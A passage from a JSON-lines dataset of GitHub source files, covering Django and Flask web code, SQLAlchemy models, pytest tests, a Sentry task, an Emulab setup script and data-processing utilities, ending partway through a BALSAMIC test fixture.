ajax.choice_thesis),\n\n\n url(r'^content/login/$', ajax.login),\n url(r'^content/logout/$', ajax.logout),\n\n url(r'^content/create_user/$', ajax.create_user),\n\n url(r'^content/forget_pwd/$', ajax.forget_pwd),\n url(r'^content/reset_pwd/$', ajax.reset_pwd),\n url(r'^content/change_pwd/$', ajax.change_pwd),\n\n url(r'^content/perfect_admin/$', ajax.perfect_admin),\n\n url(r'^content/perfect_instructor/$', ajax.perfect_instructor),\n\n url(r'^content/perfect_student/$', ajax.perfect_student),\n\n url(r'^content/delete_admin/$', ajax.delete_admin),\n\n url(r'^content/delete_instructor/$', ajax.delete_instructor),\n\n url(r'^content/delete_student/$', ajax.delete_student),\n\n url(r'^content/get_speciality/$', ajax.get_speciality),\n\n\n]","repo_name":"tmacjx/student_manage","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72076030170","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nfrom flask_restful import Api\n\nfrom service.ServiceResource import *\n\n\nclass RestServer():\n def __init__(self, config, serviceManager):\n self.rest = config\n self.app = Flask(__name__)\n self.api = Api(self.app)\n self.api.add_resource(ServiceResource, \"/service/\", resource_class_kwargs={'serviceManager': serviceManager})\n\n self.app.run(debug=True, host=\"0.0.0.0\", port=int(self.rest[\"port\"]))","repo_name":"cdsnlab/AIoTVirt","sub_path":"src/master/RestServer.py","file_name":"RestServer.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"41283046108","text":"from core.services.base_model_service import BaseModelService\nfrom resume.models import RelatedInformation, RelatedInformationImage\nfrom resume.services import InstituteService\n\n\nclass RelatedInformationService(BaseModelService):\n model_class = RelatedInformation\n institute_service = InstituteService()\n\n def update(self, instance, validated_data, **kwargs):\n request = kwargs.get(\"request\")\n user = self.core_service.get_user(request)\n validated_data[\"updated_by\"] = user\n pre_publication = instance.publications if instance.publications else []\n for attr, value in validated_data.items():\n setattr(instance, attr, value)\n instance.save()\n if len(instance.publications) > len(pre_publication):\n self.institute_service.add_batch_publication(instance.user, True)\n elif len(instance.publications) < len(pre_publication):\n self.institute_service.add_batch_publication(instance.user, False)\n return instance\n\n\nclass RelatedInformationImageService(BaseModelService):\n model_class = RelatedInformationImage\n","repo_name":"Orbin-Ahmed/findmyworks-backend","sub_path":"resume/services/related_information.py","file_name":"related_information.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38074830878","text":"import os\n\n\nclass FileFinder:\n @staticmethod\n def all_files_recursive(*paths, file_type: str='') -> list:\n files = [] \n path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..', '..', *paths))\n for obj in os.scandir(path):\n if obj.is_file() and obj.name[-len(file_type):] == file_type:\n files.append((obj.name, obj.path))\n if obj.is_dir():\n files = [*files, *FileFinder.all_files_recursive(*[*paths, obj.name], file_type=file_type)]\n files.sort()\n return files\n\n","repo_name":"shamir0xe/xellu","sub_path":"src/helpers/file/file_finder.py","file_name":"file_finder.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12421780471","text":"import json\nimport unittest\nfrom unittest.mock import patch\nfrom flask import Response, render_template, request\nfrom users import handlers\nfrom users.logic import data_comments\nfrom users.model import comments_info\nfrom users.model.comments_info import Comments\nimport pytest\nfrom flask_testing import TestCase\nfrom mock import Mock, sentinel\nfrom requests import codes, delete\nfrom os import *\n\n\nvalue_test= handlers.Comments(id,name,comment=\"\")\n\n@pytest.mark.run()\ndef test_index(mocker,fixture_client):\n fixture_client.get('/home')\n mocker.patch.object(data_comments, 'get_data', return_value= Response({'from': 'get_data'}))\n resp = fixture_client.get('/home')\n\n assert resp.status_code == 200\n result = json.loads(resp.data.decode())\n \n\n@pytest.mark.run()\n@pytest.mark.parametrize(( 'input','output'\n ),[\n (\n {\"id\":\"\",\"name\":'sheetal', \"comment\":'sheetal here'},\n 'Data Submitted Successfully.'),\n ({\"id\": \"\",\"name\":\"reeta\", \"comment\":\"reeta collection\"},\n 'Data Submitted Successfully.')\n ])\n \ndef test_post(mocker, fixture_client,input,output):\n fixture_client.post('/process')\n process_mock =mocker.patch.object(data_comments,'add_data')\n process_mock.return_value = output\n resp = fixture_client.post('/process',json=input)\n if resp.data.decode() != '':\n\n result_data = resp.data.decode()\n\n return result_data\n\n # result_data = handler_response.data.decode()\n\n assert resp.status_code == 200\n\n@pytest.mark.parametrize(('id','input','output','status_code'\n ),[\n (\n 21,{\"id\":\"1\",\"name\":'sheetal', \"comment\":'sheetal here'},\n 'Data Submitted Successfully.',200),\n (22,{\"id\": \"12\",\"name\":\"reeta\", \"comment\":\"reeta collection\"},\n 'Data Submitted Successfully.',200)\n ])\n@pytest.mark.run()\ndef test_update(mocker,fixture_client,input,output,status_code,id):\n fixture_client.put('/update/')\n update_mock =mocker.patch.object(data_comments,'update_data')\n update_mock.return_value = output\n resp = fixture_client.patch('/update/',json=input)\n if resp.data.decode() != '':\n result_data = resp.data.decode()\n return result_data\n\n assert resp.status_code == status_code\n assert result_data == output.message\n assert update_mock.called\n assert update_mock.called_once_with(id)\n\n@pytest.mark.run()\ndef test_delete(mocker):\n delete_mock = mocker.patch.object(data_comments,'delete_data')\n delete_mock.return_value = Response({'from': 'delete_data'})\n resp = data_comments.delete_data(id)\n assert resp.status_code == 200","repo_name":"priyankadhatrak/basic_flask_project","sub_path":"test/unit/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21974973926","text":"import argparse\n\nfrom _version import __version__\n\n\ndef get_cli_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"Create MR.\",\n epilog=\"python create_mr.py --token $(pass show work/CSS/gitlab/private_token) --url --project --source-branch --target-branch --title --assignee-id --remove-source-branch\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {version}\".format(version=__version__),\n )\n\n parser.add_argument(\n \"-u\",\n \"--url\",\n required=True,\n default=\"https://example.gitlab.com\",\n help=\"Gitlab host/url/server.\",\n )\n parser.add_argument(\n \"-t\",\n \"--token\",\n nargs=\"?\",\n help=\"Private Token to access gitlab API. If not given as argument, set GITLAB_PRIVATE_TOKEN.\",\n )\n parser.add_argument(\n \"--source-branch\", required=True, default=\"staging\", help=\"Source branch.\"\n )\n parser.add_argument(\n \"--target-branch\", required=True, default=\"master\", help=\"Target branch.\"\n )\n parser.add_argument(\n \"--title\", required=True, default=\"MR title.\", help=\"Merge request title.\"\n )\n parser.add_argument(\"--description\", default=\"\", help=\"Merge request description.\")\n parser.add_argument(\n \"--assignee-id\", required=True, default=-1, help=\"Gitlab user id of assignee.\"\n )\n parser.add_argument(\"--milestone-id\", default=-1, help=\"Gitlab milestone id.\")\n # default=False is implied by action='store_true'\n parser.add_argument(\n \"--remove-source-branch\",\n action=\"store_true\",\n help=\"Remove the source branch after merging.\",\n )\n # default=False is implied by action='store_true'\n parser.add_argument(\n \"--only-check-diffs\",\n action=\"store_true\",\n help=\"Only check differences between branches.\",\n )\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"Show debug info.\")\n\n return parser\n","repo_name":"normoes/gitlab_scripts","sub_path":"merge_requests/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6711835833","text":"##############################################################################################################\n####\n#### Mask Effluents\n#### By Cascade Tuholske June 2020\n####\n#### This script fixes the no data values \n#### in the effluent rasteres to speed up \n#### zonal stats processing\n####\n#### BE SURE TO SET DATA TYPE as N OR FIO\n####\n##############################################################################################################\n\n#### Dependencies \n##############################################################################################################\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport rasterio\nimport matplotlib.pyplot as plt \n\n#### File Paths and FN\n##############################################################################################################\nDATA_IN = '../../data/'\nDATA_TYPE = 'N' # FIO or N \nMASK_FN = DATA_IN+'interim/inlandwatersheds_mask.tif'\n\nif DATA_TYPE == 'N':\n effluent_rsts = [DATA_IN+'interim/effluent_N.tif', DATA_IN+'interim/effluent_N_treated.tif', \n DATA_IN+'interim/effluent_N_septic.tif', DATA_IN+'interim/effluent_N_open.tif']\n\nelif DATA_TYPE == 'FIO':\n effluent_rsts = [DATA_IN+'interim/effluent_FIO.tif']\n\nelse: \n print('What data, N or FIO?')\n\n#### Functions\n##############################################################################################################\ndef rst_nd_fix(effluent_fn, mask_fn, out_fn):\n \n \"\"\"Function opens effluent raster and fixes the \n no data values \n \n effluent_fn = effluent raster fn\n out_fn = file name out\n \"\"\"\n \n # Open effluent raster\n rst = rasterio.open(effluent_fn)\n meta = rst.meta\n \n # change na values to zero\n band = rst.read(1)\n print(\"min is\", band.min())\n band[band < 0] = 0 \n print(\"min is\", band.min())\n \n print('band max is', band.max())\n\n #Save new data type and mask out\n with rasterio.open(out_fn, 'w', **meta) as dst:\n dst.write(band, 1)\n \n print('Done', out_fn)\n\n#### Run it\n##############################################################################################################\n\n# Make masked rasters\nfor rst in effluent_rsts:\n \n # Get data type\n data = rst.split('interim/')[1].split('.')[0]\n print(data)\n\n # Raster Mask 64 \n print('Starting mask', rst)\n rst_out = DATA_IN+'interim/'+data+'_zero.tif'\n rst_nd_fix(rst, MASK_FN, rst_out)\n \n print('\\n')\n\nprint('DONE!')","repo_name":"OHI-Science/GlobalWasteWater","sub_path":"code/05_zonal_stats/01_raster_NoData_fix.py","file_name":"01_raster_NoData_fix.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7207323073","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass Product(db.Model):\n __tablename__ = 'product'\n\n id = db.Column(db.Integer, primary_key=True)\n nom = db.Column(db.String(255))\n prix = db.Column(db.Numeric(10, 2))\n description = db.Column(db.Text)\n image_url = db.Column(db.Text)\n\n def __init__(self, nom, prix, description, image_url):\n self.nom = nom\n self.prix = prix\n self.description = description\n self.image_url = image_url\n\nclass CartItem(db.Model):\n __tablename__ = 'cart_item'\n\n id = db.Column(db.Integer, primary_key=True)\n cart_id = db.Column(db.Integer, db.ForeignKey('cart.id'))\n product_id = db.Column(db.Integer, db.ForeignKey('product.id'))\n quantity = db.Column(db.Integer, default=1)\n total_price = db.Column(db.Numeric(10, 2))\n product = db.relationship('Product', backref='cart_items')\n\n def __init__(self, cart_id, product_id, quantity, total_price):\n self.cart_id = cart_id\n self.product_id = product_id\n self.quantity = quantity\n self.total_price = total_price\n\n\nclass Cart(db.Model):\n __tablename__ = 'cart'\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n items = db.relationship('CartItem', backref='cart', lazy='dynamic')\n\n def __init__(self, user_id):\n self.user_id = user_id\n\nclass User(db.Model):\n __tablename__ = 'user'\n\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(255))\n admin = db.Column(db.Integer, default=0)\n carts = db.relationship('Cart', backref='user', lazy='dynamic')\n\n def __init__(self, username, admin):\n self.username = username\n self.admin = admin\n","repo_name":"gvenet/projet_memoire","sub_path":"server/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20291181793","text":"import logging\n\nfrom sentry import audit_log, features\nfrom sentry.integrations.utils.codecov import has_codecov_integration\nfrom sentry.models.organization import Organization, OrganizationStatus\nfrom sentry.tasks.base import instrumented_task\nfrom sentry.utils.audit import create_system_audit_entry\nfrom sentry.utils.query import RangeQuerySetWrapper\n\nlogger = logging.getLogger(__name__)\n\n\n@instrumented_task(\n name=\"sentry.tasks.auto_enable_codecov.schedule_organizations\",\n queue=\"auto_enable_codecov\",\n max_retries=0,\n) # type: ignore\ndef schedule_organizations(dry_run=False) -> None:\n \"\"\"\n Queue tasks to enable codecov for each organization.\n\n Note that this is not gated by the V2 flag so we can enable the V2\n features independently of the auto-enablement.\n \"\"\"\n logger.info(\"Starting task for sentry.tasks.auto_enable_codecov.schedule_organizations\")\n for organization in RangeQuerySetWrapper(\n Organization.objects.filter(status=OrganizationStatus.ACTIVE)\n ):\n should_auto_enable = features.has(\"organizations:auto-enable-codecov\", organization)\n if should_auto_enable:\n logger.info(\n \"Processing organization\",\n extra={\"organization_id\": organization.id},\n )\n enable_for_organization(organization.id)\n\n\n@instrumented_task( # type: ignore\n name=\"sentry.tasks.auto_enable_codecov.enable_for_organization\",\n queue=\"auto_enable_codecov\",\n max_retries=5,\n)\ndef enable_for_organization(organization_id: int, dry_run=False) -> None:\n \"\"\"\n Set the codecov_access flag to True for organizations with a valid Codecov integration.\n \"\"\"\n try:\n logger.info(\n \"Attempting to enable codecov for organization\",\n extra={\"organization_id\": organization_id},\n )\n organization = Organization.objects.get(id=organization_id)\n has_integration, error = has_codecov_integration(organization)\n if not has_integration:\n logger.warning(\n \"No codecov integration exists for organization\",\n extra={\"organization_id\": organization.id, \"error\": error},\n )\n return\n\n if organization.flags.codecov_access.is_set:\n logger.warning(\n \"Codecov Access flag already set.\",\n extra={\n \"organization_id\": organization.id,\n \"codecov_access\": organization.flags.codecov_access,\n },\n )\n return\n\n organization.flags.codecov_access = True\n organization.save()\n logger.info(\n \"Enabled Codecov Access flag for organization\",\n extra={\n \"organization_id\": organization.id,\n \"codecov_access\": organization.flags.codecov_access,\n },\n )\n\n create_system_audit_entry(\n organization=organization,\n target_object=organization.id,\n event=audit_log.get_event_id(\"ORG_EDIT\"),\n data={\"codecov_access\": \"to True\"},\n )\n\n except Organization.DoesNotExist:\n logger.exception(\n \"Organization does not exist.\",\n extra={\"organization_id\": organization_id},\n )\n except Exception:\n logger.exception(\n \"Error checking for Codecov integration\",\n extra={\"organization_id\": organization_id},\n )\n","repo_name":"yuewucl/sentry","sub_path":"src/sentry/tasks/auto_enable_codecov.py","file_name":"auto_enable_codecov.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"35964283867","text":"# Takes as input the copy-pasted list of machines in the \"List View\" tab of\n# Emulab experiment page (must be titled \"machine_list.txt\" in top-level dir)\n# and sets up Emulab on proxies, sequencer, and DT(s). \n# Creates a file with each machine's ID, Node#, interface (only relevant for\n# clients since it will be brought down for DPDK machines), and MAC address.\nimport os\nimport subprocess\nimport shlex\nimport argparse\nimport platform\n\nwhich_ubuntu = int(platform.linux_distribution()[1].split(\".\")[0])\n\ndef get_ctrl_ip(ssh): \n # Needed for erpc\n cmd = ssh + \"\"\" \\\"ifconfig | grep 155\\\\.98\\\\. -B1 | awk 'NR==1{ print $1 }'\\\" \"\"\"\n try:\n iface = subprocess.check_output(shlex.split(cmd))\n iface = iface.decode().split(\":\")[0]\n if not iface:\n return None\n except:\n return None\n\n cmd = ssh + \"\"\" \\\"ifconfig %s | awk -F ' *|:' '/inet %s/{ print $3 }'\\\" \"\"\" % (iface, 'addr' if which_ubuntu is not 18 else '')\n try:\n ip = subprocess.check_output(shlex.split(cmd))\n ip = ip.decode().strip()\n if not ip:\n return None\n except:\n return None\n\n return ip\n\n\n# Get both DPDK-enabled interfaces\ndef get_iface(ssh, i):\n cmd = ssh + \"\"\" \\\"ifconfig | grep 10\\\\.1\\\\.%d -B1 | awk 'NR==1{ print $1 }'\\\" \"\"\" % i\n try:\n iface = subprocess.check_output(shlex.split(cmd))\n iface = iface.decode().split(\":\")[0]\n if not iface:\n return None, None\n except:\n return None, None\n\n cmd = ssh + \"\"\" \\\"ifconfig %s | awk -F ' *|:' '/inet %s/{ print $3 }'\\\" \"\"\" % (iface, 'addr' if which_ubuntu is not 18 else '')\n try:\n ip = subprocess.check_output(shlex.split(cmd))\n ip = ip.decode().strip()\n if not ip:\n return None, None\n except:\n return None, None\n \n return ip, iface\n \n\ndef get_mac(ssh, iface):\n if iface is None:\n return None\n cmd = ssh + \" \\\"cat /sys/class/net/%s/address\\\"\" % iface\n try: \n mac = subprocess.check_output(shlex.split(cmd))\n return mac.decode().strip()\n except: \n return None\n\ndef get_machine_info():\n clients = []\n proxies = []\n sequencers = []\n deptrackers = []\n machines = {}\n\n manual_input_flag = 0\n\n f = open(\"machine_list.txt\", \"r\")\n dump = open(\"machine_info.txt\", \"w\")\n\n for line in f.readlines():\n if line == '\\n':\n continue\n fields = line.split()\n machinename = fields[0] # e.g., \"client-0\"\n machineid = fields[1] # e.g., \"pc722\"\n\n if \"proxy\" in machinename:\n proxies.append(machinename)\n elif \"dt\" in machinename:\n deptrackers.append(machinename)\n elif \"sequencer\" in machinename:\n sequencers.append(machinename)\n else: \n clients.append(machinename)\n \n machines[machinename] = {\n 'machineid': machineid\n }\n\n ssh = \" \".join(fields[6:]) + \" -o StrictHostKeyChecking=no \"\n print(\"SSH command: \" + ssh)\n\n ctrl_ip = get_ctrl_ip(ssh)\n machines[machinename]['ctrl_ip'] = ctrl_ip\n\n for i in [1, 2]: \n ip, iface = get_iface(ssh, i)\n mac = get_mac(ssh, iface)\n\n if iface is None or mac is None:\n manual_input_flag = 1\n print(\"Couldn't get iface and/or mac--will pause before setting\" +\n \" up DPDK so you can input them manually\")\n\n machines[machinename]['iface%d' % i] = iface\n\n machines[machinename]['mac'] = mac\n machines[machinename]['ip'] = ip\n \n dump.write(\"%s,%s,%s,%s,%s,%s,%s\\n\" % (machinename, machineid, \n machines[machinename]['iface1'], mac, \n ip, ctrl_ip, machines[machinename]['iface2']))\n print(machinename, machineid, machines[machinename]['iface1'], \n mac, ip, ctrl_ip, machines[machinename]['iface2'])\n\n f.close()\n dump.close()\n\n if manual_input_flag:\n input (\"Pausing for manual input; save machine_list.txt with\" + \n \" missing values filled in, then hit any key to keep going... \")\n machines, clients, servers = read_machine_info()\n\n return machines, clients, proxies, sequencers, deptrackers\n\n\ndef read_machine_info():\n clients = []\n proxies = []\n sequencers = []\n deptrackers = []\n machines = {}\n\n f = open(\"machine_info.txt\", \"r\")\n\n for line in f.readlines():\n fields = line.split(',')\n machinename = fields[0]\n machineid = fields[1]\n iface = fields[2]\n mac = fields[3]\n ip = fields[4]\n ctrl_ip = fields[5]\n iface2 = fields[6]\n\n if \"proxy\" in machinename:\n proxies.append(machinename)\n elif \"dt\" in machinename:\n deptrackers.append(machinename)\n elif \"sequencer\" in machinename:\n sequencers.append(machinename)\n else: \n clients.append(machinename)\n \n machines[machinename] = {\n 'machineid': machineid,\n 'iface1': iface,\n 'mac': mac,\n 'ip': ip,\n 'ctrl_ip': ctrl_ip,\n 'iface2': iface2\n }\n\n f.close()\n return machines, clients, proxies, sequencers, deptrackers\n\n\ndef setup_machines(whoami, args):\n home = os.getcwd()\n codes = []\n for i, machine in enumerate(machines.keys()):\n machineid = machines[machine]['machineid']\n\n print(\"\\nSetting up DPDK on all machines...\")\n # Takes as arg: iface\n setup_cmd = (\"cd %s; sudo bash dpdk_apt_setup.sh %s %s\" % \n (home, machines[machine]['iface1'], machines[machine]['iface2']))\n\n ssh = \"ssh %s@%s.emulab.net\" % (whoami, machineid) + \" -o StrictHostKeyChecking=no \"\n setup_cmd = \"%s '%s'\" % (ssh, setup_cmd)\n p = subprocess.Popen(shlex.split(setup_cmd))\n \n # This needs to happen serially so compilation doesn't collide\n p.wait()\n codes.append((machine, p.returncode))\n\n for machine, rc in codes: \n print(\"%s completed with exit status %d\" % \n (machine, rc))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Set up all machines.')\n parser.add_argument('whoami',\n help=('Emulab username'))\n parser.add_argument('--read_info',\n help=('If set, read machine info from machine_info.txt rather than' +\n ' parsing from file.'),\n action='store_true')\n\n args = parser.parse_args()\n\n if args.read_info:\n machines, clients, proxies, sequencers, deptrackers = read_machine_info()\n else:\n machines, clients, proxies, sequencers, deptrackers = get_machine_info()\n\n setup_machines(args.whoami, args)\n","repo_name":"princeton-sns/mason","sub_path":"setup/parse_machine_list.py","file_name":"parse_machine_list.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70331785050","text":"from glob import glob\nimport os\nimport random\n\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# data = []\n# with open('block1_conv1_filters.json') as fh:\n# data = json.load(fh)\n\njson_dir = 'filter_grads'\n\nfiles = glob(os.path.join(json_dir, '*_filters.json'))\nfile_opts = list(map(lambda s: s.split('/')[-1].replace('_filters.json', ''), files))\n\nprint('Convolution layer options: ')\nfor i, opt in enumerate(file_opts):\n print('{} - {}'.format(i, opt))\n\n# First selection (for layer)\nsel = -1\ntried = False\nwhile sel < 0 or sel >= len(files):\n print('' if tried is False else 'Options must be between 0 and {}'.format(len(files) - 1))\n tried = True\n print()\n try:\n sel = int(input('Select an option from the above: '))\n except ValueError:\n continue\n\nprint('Picked layer {}'.format(file_opts[sel]))\n\ndata = []\nwith open(files[sel]) as fh:\n data = json.load(fh)\n\nnum_filts = len(data)\n\n# while True:\n# sel = input('Pick a filter between 0-{}: '.format(num_filts - 1))\n#\n# if sel == 'exit':\n# break\n#\n# try:\n# sel = int(sel)\n# if sel < 0 or sel >= num_filts:\n# raise ValueError\n# except ValueError:\n# print('Invalid value entered for filter selection')\n# continue\n#\n# print('You picked filter {}'.format(sel))\n#\n# img = np.uint8(np.array(data[sel][0]))\n#\n# plt.imshow(img)\n# plt.show()\n#\n# print('Thank you for using!')\n\nenums = list(enumerate(data))\nrandom.shuffle(enums)\n\nfor i, (filter, loss) in enums:\n img = np.uint8(np.array(filter))\n\n plt.imshow(img)\n plt.title('Filter {}; Loss {}'.format(i, loss))\n plt.show()\n\n\n","repo_name":"gennadiryan/toy-cnn","sub_path":"visualization/filter_disp.py","file_name":"filter_disp.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9786836609","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\nTomasz Konieczka \nThis is a temporary script file.\n\"\"\"\n\n# run --> python3 projekt.py plik.json dane.txt\n\nimport sys\nimport numpy as np\nfrom funkcje import activation\nfrom dane import auxiliary\nfrom siec import siec as model\nfrom warstwa import warstwa\nfrom tf import tf_test\n\n\nif __name__ == \"__main__\":\n #print(sys.argv)\n print('Number of arguments:', len(sys.argv)-1, 'arguments.\\n')\n if(len(sys.argv) > 3):\n print('ERR!! - Zbyt duzo parametrow wejsciowych.\\nPodaj dwa parametry...')\n sys.exit()\n \n data_raw = np.genfromtxt(sys.argv[2] , delimiter=' ', usecols=(1, 2))\n (x_train, y_train), (x_test, y_test) = auxiliary.dataDividing(data_raw) \n \n tf_model = tf_test()\n tf_model.tf_test(data_raw)\n \n mod = model( [warstwa(3, activation.tanh)], sys.argv[1])\n mod.layers[1].W = np.transpose(tf_model.weights0)\n mod.layers[2].W = np.transpose(tf_model.weights1)\n \n mod.layers[1].bias = np.transpose(tf_model.bias0)\n mod.layers[2].bias = np.transpose(tf_model.bias1)\n pred = mod(x_test[100:101])\n print(y_test[100:101])\n \n print('\\n\\n zaszumienie danych w pliku dane.py!')\n print('\\n dwie przykladowe dane treningowe przed zaszumieniem: {}'.format(x_train[8:10]))\n #zaszumienie danych treningowych\n x_train = auxiliary.dataNoise(x_train, 5)\n print('\\n dwie przykladowe dane treningowe po zaszumieniu: {}'.format(x_train[8:10]))\n \n print('\\n\\nodpowiedz wlasnej sieci: ')\n print(*pred)\n print('\\nodpowiedz tf')\n print(tf_model.model(x_test[100:101]))\n","repo_name":"tomal74/artificial-neural-network-Python","sub_path":"projekt.py","file_name":"projekt.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22036456484","text":"from production import AND, OR, NOT, PASS, FAIL, IF, THEN, \\\n match, populate, simplify, variables\nfrom zookeeper import ZOOKEEPER_RULES\nfrom functools import partial\n\n# This function, which you need to write, takes in a hypothesis\n# that can be determined using a set of rules, and outputs a goal\n# tree of which statements it would need to test to prove that\n# hypothesis. Refer to the problem set (section 2) for more\n# detailed specifications and examples.\n\n# Note that this function is supposed to be a general\n# backchainer. You should not hard-code anything that is\n# specific to a particular rule set. The backchainer will be\n# tested on things other than ZOOKEEPER_RULES.\n\n\ndef backchain_to_goal_tree(rules, hypothesis):\n goal = OR(hypothesis)\n backchain = partial(backchain_to_goal_tree, rules)\n\n for rule in rules:\n csq = rule.consequent()\n if isinstance(csq, str): csq = [csq]\n\n for clause in csq:\n binds = match(clause, hypothesis)\n\n if binds != None:\n ants = rule.antecedent()\n if isinstance(ants, str): ants = [ants]\n\n op = None\n if isinstance(ants, OR): op = OR\n else: op = AND\n\n goal.append(op([backchain(populate(ant, binds)) for ant in ants]))\n\n return simplify(goal)\n\n\n# Here's an example of running the backward chainer - uncomment\n# it to see it work:\n#print backchain_to_goal_tree(ZOOKEEPER_RULES, 'opus is a penguin')\n","repo_name":"rcebulko/AI_Labs","sub_path":"Lab 1/lab1/backchain.py","file_name":"backchain.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24165268770","text":"import os\nimport cv2\nimport time\n\ndir_path = \"../data_raw\"\n\ndic = {\"Air\": \"cam0\", \"Earth\": \"cam1\", \"Fire\": \"cam2\", \"Water\": \"cam3\"}\ndirs = os.listdir(dir_path)\n# print(dirs)\n\nfor dir_name in dirs:\n # print(dir_name)\n if os.path.isdir(os.path.join(dir_path, dir_name)):\n cam_names = dir_name.split(\"_\")\n cam_dir = [os.path.join(\".\", dic[cam_names[i]]) for i in range(len(cam_names))]\n # print(cam_dir)\n for i in range(len(cam_dir)):\n # print(cam_dir[i])\n if not os.path.exists(cam_dir[i]):\n os.mkdir(cam_dir[i])\n # print((os.path.isdir(os.path.join(dir_path, dir_name)))\n\n for img_file in os.listdir(os.path.join(dir_path, dir_name)):\n img = cv2.imread(os.path.join(dir_path, dir_name,img_file))\n # print(img_file)\n img2 = img\n\n height, width, channels = img.shape\n\n for i in range(len(cam_dir)):\n x = int(width/2 * i)\n y = 0\n h = height\n w = int(width / 2)\n # print(x,y, x+w, y+h)\n img = img[y:y+h, x:x+w]\n\n filename = dir_name + \"_\" + img_file[-6:]\n NAME = os.path.join(cam_dir[i], filename) \n cv2.imwrite(NAME,img)\n img = img2","repo_name":"stanfordwhil/kalibr","sub_path":"data/separater.py","file_name":"separater.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"36100034809","text":"import pytest\nimport json\nimport os\n\nfrom unittest import mock\nfrom distutils.dir_util import copy_tree\nfrom pathlib import Path\nfrom functools import partial\nfrom click.testing import CliRunner\nfrom .helpers import ConfigHelper\nfrom BALSAMIC.commands.base import cli\nfrom BALSAMIC import __version__ as balsamic_version\n\nMOCKED_OS_ENVIRON = \"os.environ\"\n\n\n@pytest.fixture\ndef cli_runner():\n \"\"\"click - cli testing\"\"\"\n runner = CliRunner()\n return runner\n\n\n@pytest.fixture\ndef invoke_cli(cli_runner):\n \"\"\"invoking cli commands with options\"\"\"\n return partial(cli_runner.invoke, cli)\n\n\n@pytest.fixture(scope=\"session\")\ndef environ():\n \"\"\"environment process\"\"\"\n return \"os.environ\"\n\n\n@pytest.fixture(scope=\"session\")\ndef config_files():\n \"\"\"dict: path of the config files\"\"\"\n return {\n \"sample\": \"BALSAMIC/config/sample.json\",\n \"analysis_paired\": \"BALSAMIC/config/analysis_paired.json\",\n \"cluster_json\": \"BALSAMIC/config/cluster.json\",\n \"analysis_paired_umi\": \"BALSAMIC/config/analysis_paired_umi.json\",\n \"analysis_single\": \"BALSAMIC/config/analysis_single.json\",\n \"analysis_single_umi\": \"BALSAMIC/config/analysis_single_umi.json\",\n \"panel_bed_file\": \"tests/test_data/references/panel/panel.bed\",\n \"background_variant_file\": \"tests/test_data/references/panel/background_variants.txt\",\n \"pon_fastq_path\": \"tests/test_data/fastq/\",\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef reference():\n \"\"\"reference json model\"\"\"\n return {\n \"reference\": {\n \"reference_genome\": \"tests/test_data/references/genome/human_g1k_v37_decoy.fasta\",\n \"dbsnp\": \"tests/test_data/references/variants/dbsnp_grch37_b138.vcf.gz\",\n \"1kg_snps_all\": \"tests/test_data/references/variants/1k_genome_wgs_p1_v3_all_sites.vcf.gz\",\n \"1kg_snps_high\": \"tests/test_data/references/variants/1kg_phase1_snps_high_confidence_b37.vcf.gz\",\n \"1kg_known_indel\": \"tests/test_data/references/variants/1kg_known_indels_b37.vcf.gz\",\n \"mills_1kg\": \"tests/test_data/references/variants/mills_1kg_index.vcf.gz\",\n \"gnomad_variant\": \"tests/test_data/reference/variants/gnomad.genomes.r2.1.1.sites.vcf.bgz\",\n \"cosmic\": \"tests/test_data/references/variants/cosmic_coding_muts_v89.vcf.gz\",\n \"vep\": \"tests/test_data/references/vep/\",\n \"refflat\": 